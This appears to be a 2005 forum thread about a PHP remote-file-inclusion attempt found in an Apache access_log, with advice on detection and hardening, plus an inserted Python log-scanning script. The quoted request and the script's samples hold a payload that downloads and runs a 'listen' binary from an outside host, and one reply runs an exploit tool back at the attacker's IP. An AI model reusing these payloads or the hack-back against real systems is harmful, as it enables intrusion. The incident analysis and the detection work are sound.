access_log compromise ??
I saw a similar post yesterday, only one of my entries had a 200 status.
Can anyone tell me what they were able to accomplish, or what I need to look for?

24.70.88.18 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]= com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= http://81.174.26.111/cmd.gif?&cmd= cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 200 683 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" |
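As an added example, not part of the thread, here is a small Python script that parses access_log entries in Apache's combined format and flags requests carrying the indicators seen in the entry above: a remote URL in mosConfig_absolute_path, GLOBALS/_REQUEST overrides, and shell commands smuggled into a query parameter. The sample log lines and the 192.0.2.x/203.0.113.x addresses are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format, the same layout as the access_log entry in the thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators from the request discussed in the thread, checked after URL-decoding.
INDICATORS = {
    "remote_include": re.compile(r'mosConfig_absolute_path=https?://', re.I),
    "globals_override": re.compile(r'(?:^|[?&])(?:GLOBALS|_REQUEST\[[^\]]*\])=', re.I),
    "shell_command": re.compile(r'\b(?:wget|curl|chmod)\b', re.I),
}

# Constructed sample lines: one benign request, one attempt answered with 200,
# one attempt answered with 404. The include host is a placeholder address.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Dec/2005:19:20:01 -0600] "GET /index.php?option=com_content&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Dec/2005:19:23:50 -0600] "GET /index.php?option=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.99/c.txt?&cmd=cd%20/tmp;wget%20203.0.113.99/listen;chmod%20744%20listen;./listen HTTP/1.1" 200 683 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [16/Dec/2005:19:23:52 -0600] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://203.0.113.99/c.txt? HTTP/1.1" 404 210 "-" "Mozilla/4.0"',
]

def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(line):
    """Return (status, [indicator names]) for one line, or None if it is unparseable."""
    rec = parse_line(line)
    if rec is None:
        return None
    decoded = unquote_plus(rec["url"])  # %20 -> space, so 'cd /tmp;wget ...' becomes visible
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return int(rec["status"]), hits

def suspicious(lines):
    """(ip, status, indicators) for every line with at least one indicator.
    Entries answered with 200 are the ones that need a closer look on the host."""
    out = []
    for line in lines:
        res = classify(line)
        if res and res[1]:
            out.append((parse_line(line)["ip"], res[0], res[1]))
    return out

if __name__ == "__main__":
    for ip, status, hits in suspicious(SAMPLE_LOG):
        print(ip, status, ",".join(hits))
```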
They are trying to exploit PHP code and install an IRC bot. Disable global variables and turn safe_mode on in php.ini.
|
Also, look through ps and netstat output; if you were compromised, the listen process will show up in your ps. Look in /tmp and see if the listen binary is there. Remember, if your webserver is running as root, the exploiter owns your system and could have installed rootkits, etc. to hide his presence. The only remedy is to unplug your system from the network, analyze it, and most probably do a clean re-install.
|
The webserver is running under the apache id. And the only thing in /tmp is:
keyring-1TvKkp mapping-root |
Code:
nic0@nic0:~$ ./aw 24.70.88.18 * "ps -ef|grep httpd" 3

l337 hax0rs should make sure their computer is secure first. ;) |
Holy smokes. How do I make sure that can't be done to my machine?
Also, what will disabling global variables and turning safe mode on do? |
Disabling global variables prevents people from entering their own variables into a request.
In general, turning it off increases security a lot. PHP safe mode disables a lot of functions that remote users could exploit. |
So in /etc/php.ini if I have:
register_globals = Off
safe_mode = On

Then this should help a bit? |
Yep, this will improve your PHP security a lot. I also recommend getting a security scanner and checking for common vulnerabilities, something like Nessus or Amap.
|